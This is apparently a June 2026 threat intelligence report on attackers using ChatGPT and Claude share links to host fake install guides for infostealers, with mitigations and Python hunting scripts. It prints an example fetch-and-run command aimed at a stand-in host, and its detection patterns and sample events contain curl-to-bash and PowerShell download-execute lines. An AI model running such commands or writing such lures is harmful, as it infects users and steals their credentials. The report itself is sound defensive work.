Attackers Abusing ChatGPT and Claude Content-Sharing Features for Malware Delivery and Phishing

Hackers Abuse ChatGPT and Claude 'Share' Features to Host Malware

MEDIUM
June 2, 2026
Phishing, Malware, Cloud Security

Related Entities

Organizations

Push Security

Products & Tech

ChatGPT, Claude

Other

OpenAI, Anthropic

Full Report

Executive Summary

Cybercriminals are weaponizing the legitimate features of popular Large Language Model (LLM) chatbots, including OpenAI's ChatGPT and Anthropic's Claude, to serve as a delivery mechanism for malware. Research from Push Security reveals that threat actors are abusing content-sharing functionalities to host malicious content on the AI platforms' own trusted domains. Attackers create and share conversation links that lead to pages containing social engineering lures. These lures, often disguised as installation guides, persuade users to copy and paste malicious command-line instructions (e.g., curl commands) into their terminals, leading to the download and execution of malware, suspected to be infostealers. This technique capitalizes on the trust users place in these AI brands and their domains.


Threat Overview

The attack is a form of social engineering that leverages the infrastructure of the AI providers themselves.

  • Abuse of Trusted Domains: The core of the attack is hosting the malicious lure on a legitimate, trusted domain like chat.openai.com or claude.ai. This makes the link appear safe to users and may bypass simple domain-based blocklists.
  • Shared Conversation Feature: Attackers use the 'share conversation' feature to generate a permanent, public URL for a chat they have crafted. This chat contains the malicious instructions.
  • Social Engineering Lure: The shared chat is designed to be convincing. One example cited was a page titled "Claude Code on Mac" attributed to "Apple Support," which instructed the user to run a curl command to 'install' a tool.
  • Command-Line Deception: The attack preys on the growing normalization of using command-line installers, especially among developers. Users are tricked into running a command that they believe is for a legitimate purpose, but it actually downloads and executes malware.
  • Payload: The end payload in the observed campaigns is believed to be information-stealing malware, designed to harvest credentials, cookies, and other sensitive data from the victim's machine.

Technical Analysis

The attack chain is simple but effective:

  1. Lure Creation: An attacker crafts a conversation in ChatGPT or Claude that contains malicious instructions disguised as a helpful guide.
  2. Link Generation: The attacker uses the 'share' feature to create a public URL for this conversation.
  3. Distribution (T1566.002): This malicious URL is distributed to potential victims via phishing emails, social media, or forums.
  4. User Interaction (T1204.002): The victim clicks the link and is taken to the trusted AI domain, where they see the attacker's lure.
  5. Malicious Command Execution (T1059.004): Trusting the source, the victim copies the provided command (e.g., curl -sL http://malicious.server/install.sh | bash) and runs it in their terminal.
  6. Payload Installation: The command downloads and executes the malware from an attacker-controlled server, infecting the victim's machine.

This technique is a variation of Drive-by Compromise (T1189), where the user is an active participant in their own compromise, tricked by the trusted context.


Impact Assessment

While technically simple, this attack vector poses a significant threat due to its psychological effectiveness.

  • Bypassing User Skepticism: Users are trained to look for suspicious domains, but a link starting with https://chat.openai.com is likely to be trusted.
  • Targeting Technical Users: This attack is particularly effective against developers and IT professionals who are comfortable with the command line and may be less suspicious of curl | bash style installers, which are common in the developer community.
  • Infostealer Deployment: A successful attack leads to the deployment of infostealer malware, which can result in the compromise of personal and corporate accounts, financial theft, and further network intrusion.

IOCs — Directly from Articles

No specific malware hashes or C2 domains were provided in the source articles.


Cyber Observables — Hunting Hints

Detection should focus on the delivery and execution stages:

  • Type: command_line_pattern
    Value: `curl * | bash` or `powershell -c "IEX (New-Object Net.WebClient).DownloadString('*')"`
  • Type: url_pattern
    Value: chat.openai.com/share/ or claude.ai/chat/
    Description & Context: While these are legitimate, security teams can monitor for a high volume of traffic to these shared links from corporate devices, which could indicate a phishing campaign.
  • Type: process_name
    Value: curl.exe, powershell.exe, bash.exe
    Description & Context: Look for these processes making outbound connections to download files, followed by the execution of new, unsigned processes.
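
The url_pattern hint above can be turned into a proxy-log hunt. The following is an added example, not code from the source article or from Push Security: it flags a shared-conversation link opened by several distinct users inside a short window. The log format, user names, conversation IDs and thresholds are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Host and path prefix of each url_pattern in the hunting hints.
SHARE_PATTERNS = [("chat.openai.com", "/share/"), ("claude.ai", "/chat/")]

def share_key(url):
    """Return 'host/path' for a shared-conversation URL, else None."""
    parts = urlsplit(url)
    host, path = (parts.hostname or "").lower(), parts.path.rstrip("/")
    for want_host, prefix in SHARE_PATTERNS:
        if host == want_host and path.startswith(prefix):  # exact host only
            return host + path
    return None

def flag_campaign_links(log_lines, min_users=3, window=timedelta(hours=1)):
    """Map links opened by >= min_users distinct users within `window` to
    those users. Assumed line format (constructed): 'ISO-time user url'."""
    visits = defaultdict(list)               # link -> [(time, user), ...]
    for line in log_lines:
        fields = line.split()
        key = share_key(fields[2]) if len(fields) == 3 else None
        if key:
            visits[key].append((datetime.fromisoformat(fields[0]), fields[1]))
    flagged = {}
    for link, hits in visits.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):    # slide the window start
            users = {u for t, u in hits[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged[link] = sorted(users)
                break
    return flagged

# Constructed proxy log; users and conversation IDs are placeholders.
SAMPLE_PROXY_LOG = [
    "2026-06-02T09:01:10 alice https://chat.openai.com/share/EXAMPLE-ID-1",
    "2026-06-02T09:05:42 bob https://chat.openai.com/share/EXAMPLE-ID-1",
    "2026-06-02T09:20:03 carol https://chat.openai.com/share/EXAMPLE-ID-1",
    "2026-06-02T09:30:00 alice https://claude.ai/chat/EXAMPLE-ID-2",
    "2026-06-02T14:00:00 dave https://claude.ai/chat/EXAMPLE-ID-2",
    "2026-06-02T09:31:00 bob https://chat.openai.com/",
]

if __name__ == "__main__":
    for link, users in flag_campaign_links(SAMPLE_PROXY_LOG).items():
        print(f"REVIEW {link}: opened by {users}")
```

A flagged link is a lead for review, not a verdict: the same pattern appears when colleagues pass around a legitimate conversation.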

Detection & Response

  1. Command-Line Logging: Ensure that comprehensive command-line logging is enabled on all endpoints (e.g., PowerShell script block logging, Event ID 4688 with command line). Ingest these logs into a SIEM to hunt for suspicious patterns like curl | bash.
  2. EDR Monitoring: A properly configured EDR should alert on a shell process (bash, sh) spawning a network connection to download a file and then executing it. This is a high-confidence indicator of malicious activity.
  3. URL Filtering: While blocking the entire AI domain is not feasible, organizations could consider using URL filtering categories to block or flag links to shared content from these platforms if they are not required for business.

Mitigation

  1. User Training (M1017): This is primarily a social engineering attack, so user education is the most critical defense. Train all users, especially technical ones, on the dangers of blindly copying and pasting commands from the internet, regardless of the source. Teach them to inspect scripts before executing them.
  2. Restrict Execution (M1038): Use application control and script execution policies to limit the ability of users to run arbitrary scripts downloaded from the internet.
  3. Corporate Policy: Establish clear corporate policies on the use of public AI tools and their features. If the 'share conversation' feature has no business use, consider educating users not to use it or click on such links.

Timeline of Events

June 2, 2026: This article was published.

MITRE ATT&CK Mitigations

The primary defense is to train users never to copy and execute commands from the internet without understanding what they do, regardless of the source.

Enable PowerShell Constrained Language Mode and other script execution restrictions to limit the damage of maliciously executed commands.

Audit (M1047, enterprise)

Enable and monitor command-line logging to detect the use of dangerous patterns like piping remote scripts directly to a shell.

D3FEND Defensive Countermeasures

While user training is key, technical controls can help. Since this attack relies on social engineering, a primary defense is to educate users on the dangers of executing commands from any website, even trusted ones. Specifically, train developers and technical staff that curl | bash is an anti-pattern for secure installation and that any script should be downloaded, inspected, and then executed. This breaks the attack chain by preventing the user from completing the malicious action.

Implement robust endpoint detection and response (EDR) rules that focus on suspicious process chains. A high-fidelity rule for this attack would be: Alert when a shell process (bash, sh, zsh) is spawned with a parent process of a web browser, and that shell process then makes a network connection. An even stronger rule would detect the curl | bash pattern directly from command-line logs. This focuses on the malicious behavior (executing remote, un-vetted code) rather than the specific payload, making it a more durable detection.
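
The command-line detection described here and under "Detection & Response" can be prototyped over exported process logs before it is written as a SIEM rule. This is an added example, not a rule from the source article; it goes slightly beyond the literal curl | bash string to cover wget and the command-substitution forms that have the same effect. Rule names, hosts and URLs are constructed placeholders.

```python
import re

# Assumption: each event is a (host, command line) pair already extracted
# from endpoint telemetry such as Event ID 4688 or shell audit logs.
# A shell name not glued to a longer word or file name (push, install.sh).
SHELL = r"(?<![\w.-])(?:sudo\s+)?(?:/\S*/)?(?:ba|z|da|k)?sh\b"
FETCH = r"\b(?:curl|wget)\b"

RULES = [
    # curl ... | bash : remote script piped straight into a shell
    ("fetch_piped_to_shell",
     re.compile(FETCH + r"[^|;\n]*\|\s*" + SHELL, re.I)),
    # bash -c "$(curl ...)" and bash <(curl ...) : same effect, no pipe
    ("shell_runs_fetch_substitution",
     re.compile(SHELL + r"[^|;\n]*(?:\$\(|<\(|`)\s*" + FETCH, re.I)),
    # powershell IEX (New-Object Net.WebClient).DownloadString('...')
    ("powershell_iex_downloadstring",
     re.compile(r"\b(?:iex|invoke-expression)\b.*downloadstring\s*\(", re.I)),
]

def classify(cmdline):
    """Return the name of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def hunt(events):
    """Return (host, cmdline, rule names) for each event that matches a rule."""
    return [(h, c, classify(c)) for h, c in events if classify(c)]

# Constructed sample telemetry; hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    ("mac-dev-01", "curl -sL http://malicious.server/install.sh | bash"),
    ("mac-dev-02", 'bash -c "$(curl -fsSL https://example.invalid/i.sh)"'),
    ("win-it-07", "powershell -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://example.invalid/a.ps1')\""),
    # Benign look-alikes that must not alert:
    ("mac-dev-03", "curl -s https://api.example.invalid/status | jq .status"),
    ("mac-dev-04", "curl -fsSLo install.sh https://example.invalid/install.sh"),
    ("mac-dev-05", "git push origin $(curl -s https://example.invalid/branch)"),
]

if __name__ == "__main__":
    for host, cmd, hits in hunt(SAMPLE_EVENTS):
        print(f"ALERT {host} {hits}: {cmd}")
```

The benign rows show why the rules key on a fetch tool feeding a shell rather than on curl alone: downloading to a file or piping to a parser does not alert.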

Sources & References

Attackers Abuse Shared Content for ChatGPT Phishing Campaign. Infosecurity Magazine (infosecurity-magazine.com), June 1, 2026.

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

ChatGPT, Claude, Phishing, Malware, Social Engineering, Infostealer, OpenAI
